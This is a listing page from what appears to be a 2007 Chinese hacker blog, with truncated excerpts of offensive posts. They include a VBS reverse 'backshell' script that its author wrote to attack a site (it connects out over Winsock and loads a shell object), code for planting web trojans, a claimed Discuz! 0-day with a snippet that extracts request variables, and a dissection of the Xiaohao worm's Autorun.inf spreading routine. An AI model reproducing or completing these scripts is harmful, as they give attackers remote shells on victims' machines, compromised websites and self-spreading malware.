源码第2页-夜火博客

2007年12月24日

TCP版backshell的VBS脚本

From:baicker'搞一个特殊的站准备用的，没想到，等写完了，洞补上了，郁闷'by 009, baicker@hotmail.com'date:071221Dim revdataset sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )set sc=createobject( "WScript.Shell" )Set fso =CreateObject( "Scripting.FileSystemObject" )sock.connect "127.0.0.1" , 1234......................................

2007年12月10日

各种网页木马挂马的代码

1、嵌入网页以下是引用片段： 2、PHP网页挂马以下是引用片段：..........................................................................

2007年11月25日

Discuz! 6.0.0 0Day漏洞

// 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");

2007年09月01日

小浩(X14o-H4o)病毒的简单源码分析(不完全研究)

2007年08月27日 16:44网上最近炒得火热的小浩(Xiaohao) 这个木马，在很不经意的情况下，偷到了源代码，以我这个只会 DOS 下简单 C 语言的水平，分析了一下，这个木马实在的不高明，具体详细说来。首先，是 WormBegin.cpp 这个源码里的：1 写入 Autorun.inf 文件BOOL CWormBegin::GRDirctory(CString Path) //每个盘下加auto{char ff[256];............